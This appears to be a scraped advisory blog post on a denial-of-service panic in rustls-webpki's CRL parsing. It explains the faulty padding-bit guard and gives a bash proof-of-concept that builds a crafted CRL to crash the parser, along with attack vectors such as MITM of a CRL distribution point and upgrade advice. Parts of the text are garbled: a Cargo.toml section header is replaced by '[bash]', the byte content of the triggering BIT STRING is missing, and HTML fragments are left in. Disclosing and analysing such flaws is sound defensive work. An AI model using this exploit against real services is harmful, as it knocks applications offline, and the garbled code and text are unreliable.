Listen to this Post
How the Vulnerability Works
The `bit_string_flags()` function in `src/der.rs` extracts named-bit BIT STRINGs (KeyUsage, ReasonFlags, etc.) and validates padding bits. Its guard condition:
if padding_bits > 7 || (raw_bits.is_empty() && padding_bits != 0) {
return Err(Error::BadDer);
}
let last_byte = raw_bits[raw_bits.len() - 1]; // ← crash
does not handle the case where padding_bits == 0 && raw_bits.is_empty(). When a BIT STRING contains `
` (one byte for padding bits set to zero, no data bytes), the guard passes, but `raw_bits.len() - 1` underflows to <code>usize::MAX</code>, causing an out-of-bounds panic. This vulnerability is reachable via `BorrowedCertRevocationList::from_der()` through the `issuingDistributionPoint` CRL extension, specifically the `onlySomeReasons` field. The crash occurs before the CRL's signature is verified, making it a low‑complexity attack. Precondition: CRL checking is opt‑in in rustls‑webpki. Only applications that explicitly pass `RevocationOptions` to `verify_for_usage()` and load attacker‑influenced CRL bytes are affected. Default rustls configurations that do not use CRLs are safe. <h2 style="color: blue;">dailycve form</h2> [bash] Platform: rustls-webpki Version: 0.102.8 Vulnerability: Reachable panic Severity: medium date: 2026-04-24 Prediction: 2026-05-01
What Undercode Say:
!/bin/bash
Exploit PoC for GHSA-82j2-j2ch-gfr8
Creates a minimal CRL that triggers the panic
cat > Cargo.toml <<EOF
[bash]
rustls-webpki = "0.102.8"
EOF
cat > src/main.rs <<EOF
fn main() {
let crl = [
0x30, 0x65, 0x30, 0x50, 0x02, 0x01, 0x01, 0x30, 0x0d, 0x06, 0x09,
0x2a, 0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01, 0x01, 0x0b, 0x05, 0x00,
0x30, 0x0c, 0x31, 0x0a, 0x30, 0x08, 0x06, 0x03, 0x55, 0x04, 0x03,
0x13, 0x01, 0x41, 0x17, 0x0d, 0x32, 0x30, 0x30, 0x31, 0x30, 0x31,
0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x5a, 0x17, 0x0d, 0x32, 0x31,
0x30, 0x31, 0x30, 0x31, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x5a,
0xa0, 0x10, 0x30, 0x0e, 0x30, 0x0c, 0x06, 0x03, 0x55, 0x1d, 0x1c,
0x04, 0x05, 0x30, 0x03, 0x83, 0x01, 0x00, 0x30, 0x0d, 0x06, 0x09,
0x2a, 0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01, 0x01, 0x0b, 0x05, 0x00,
0x03, 0x02, 0x00, 0x00,
];
let _ = webpki::BorrowedCertRevocationList::from_der(&crl);
}
EOF
cargo run
Output: thread 'main' panicked at 'index out of bounds: the len is 0 but the index is 18446744073709551615'
Exploit:
To trigger the crash, an attacker supplies a specially crafted CRL that includes an `issuingDistributionPoint` extension with an `onlySomeReasons` field that is an empty BIT STRING (content [bash]). This causes the panic during CRL parsing before signature validation, making the attack viable without cryptographic bypasses.
Protection from this CVE
Upgrade rustls‑webpki to version 0.103.13 or any later release (e.g., 0.104.0‑alpha.7). For crates that do not use CRLs, no action is required.
Impact
- Denial of Service – A remote attacker can cause the application to panic, crashing the service (e.g., an mTLS server or a TLS client that checks server CRLs).
- Attack Vector – Sending a malicious CRL over a network connection (e.g., via a custom CDP URL or MITM of an HTTP CRL distribution point).
- Affected Configurations – Only applications that explicitly enable CRL revocation checking via `RevocationOptions` and load CRL data from untrusted sources.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

